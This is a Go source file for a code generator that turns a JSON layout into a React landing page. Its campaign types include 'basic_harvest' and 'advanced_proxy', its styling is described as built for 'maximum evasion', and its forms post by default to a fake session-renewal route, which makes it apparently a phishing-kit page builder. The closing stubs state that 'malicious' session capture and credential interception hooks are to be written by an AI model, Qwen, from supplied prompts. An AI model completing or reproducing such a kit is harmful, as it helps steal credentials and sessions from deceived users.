package reactgen

import (
	"encoding/json"
	"fmt"
	"strings"
)

// AST represents the root configuration sent by the Landing Application Builder.
type AST struct {
	CampaignType string `json:"campaignType"` // "awareness", "basic_harvest", "advanced_proxy"
	RootNode     Node   `json:"rootNode"`
}

// Node represents a recursive structural React component on the canvas.
type Node struct {
	ID         string            `json:"id"`
	Type       string            `json:"type"`       // "row", "column", "heading", "text", "button", "input", "form"
	Properties map[string]string `json:"properties"` // e.g., "content": "Submit"
	Styles     map[string]string `json:"styles"`     // CSS flexbox, colors, etc.
	Children   []Node            `json:"children"`
}

// Transpile converts the JSON AST into the physical string representation of App.tsx
func Transpile(payload []byte) (string, error) {
	var ast AST
	if err := json.Unmarshal(payload, &ast); err != nil {
		return "", fmt.Errorf("failed to parse React AST: %w", err)
	}

	var sb strings.Builder

	// Write React Imports
	sb.WriteString(`import React, { useState, useEffect } from 'react';` + "\n\n")

	// Inject specific telemetry/proxy hooks based on the operator's CampaignType Wizard selection
	sb.WriteString(generateCampaignHooks(ast.CampaignType))

	// Begin the Main Application Component
	sb.WriteString(`export default function App() {` + "\n")
	
	// Inject the activation hooks inside the component
	sb.WriteString(generateCampaignHookActivators(ast.CampaignType))

	sb.WriteString(`  return (` + "\n")
	
	// Recursively walk the AST and generate the DOM tree
	appJsx := walkNode(ast.RootNode, 2)
	sb.WriteString(appJsx)
	
	sb.WriteString(`  );` + "\n")
	sb.WriteString(`}` + "\n")

	return sb.String(), nil
}

// walkNode generates the JSX representation of a component and its children natively.
func walkNode(node Node, indentLevel int) string {
	indent := strings.Repeat("  ", indentLevel)
	
	// Convert arbitrary style maps into stealth CSS-in-JS properties for maximum evasion
	styleStr := generateCSSinJS(node.Styles)
	
	// Specific Node Transpilation logic
	switch node.Type {
	case "row", "column", "container", "root": 
		return fmt.Sprintf("%s<div id=\"%s\" style={%s}>\n%s\n%s</div>", 
			indent, node.ID, styleStr, walkChildren(node.Children, indentLevel+1), indent)

	case "heading":
		content := node.Properties["content"]
		level := node.Properties["level"]
		if level == "" { level = "2" }
		return fmt.Sprintf("%s<h%s id=\"%s\" style={%s}>%s</h%s>", 
			indent, level, node.ID, styleStr, content, level)

	case "text", "paragraph":
		content := node.Properties["content"]
		return fmt.Sprintf("%s<p id=\"%s\" style={%s}>%s</p>", 
			indent, node.ID, styleStr, content)

	case "button":
		content := node.Properties["content"]
		return fmt.Sprintf("%s<button id=\"%s\" type=\"button\" style={%s}>%s</button>", 
			indent, node.ID, styleStr, content)

	case "form":
		actionRoute := node.Properties["actionRoute"]
		if actionRoute == "" { actionRoute = "/api/v1/session/renew" }
		return fmt.Sprintf("%s<form id=\"%s\" style={%s} action=\"%s\" method=\"POST\">\n%s\n%s</form>", 
			indent, node.ID, styleStr, actionRoute, walkChildren(node.Children, indentLevel+1), indent)
	
	case "input":
		inputType := node.Properties["inputType"]
		if inputType == "" { inputType = "text" }
		name := node.Properties["name"]
		placeholder := node.Properties["placeholder"]
		return fmt.Sprintf("%s<input id=\"%s\" type=\"%s\" name=\"%s\" placeholder=\"%s\" style={%s} />", 
			indent, node.ID, inputType, name, placeholder, styleStr)

	default:
		return fmt.Sprintf("%s<div id=\"%s\" style={%s}>\n%s\n%s</div>", 
			indent, node.ID, styleStr, walkChildren(node.Children, indentLevel+1), indent)
	}
}

func walkChildren(children []Node, indentLevel int) string {
	var results []string
	for _, child := range children {
		results = append(results, walkNode(child, indentLevel))
	}
	return strings.Join(results, "\n")
}

// generateCSSinJS translates the JSON CSS dictionary into React JSX style props dynamically
func generateCSSinJS(styles map[string]string) string {
	if len(styles) == 0 {
		return "{}"
	}
	b, _ := json.Marshal(styles)
	return string(b)
}

// ---------------------------------------------------------------------------------
// QWEN HAND-OFF STUBS
// These functions are intentionally omitted from execution by the primary logic.
// The malicious telemetry, session capture, and credential interception hooks 
// will be generated by Qwen via the provided prompts.
// ---------------------------------------------------------------------------------

func generateCampaignHooks(campaignType string) string {
	// TODO(Qwen): Implement telemetry modules, session interceptors, and 
	// conditional module imports based on campaignType string.
	return "\n// [QWEN_INJECTION: TELEMETRY_HOOKS_DECLARATION]\n"
}

func generateCampaignHookActivators(campaignType string) string {
	// TODO(Qwen): Implement React useEffect activation logic, heartbeats, 
	// and interception proxy form bindings.
	return "    // [QWEN_INJECTION: TELEMETRY_HOOKS_ACTIVATION]\n"
}
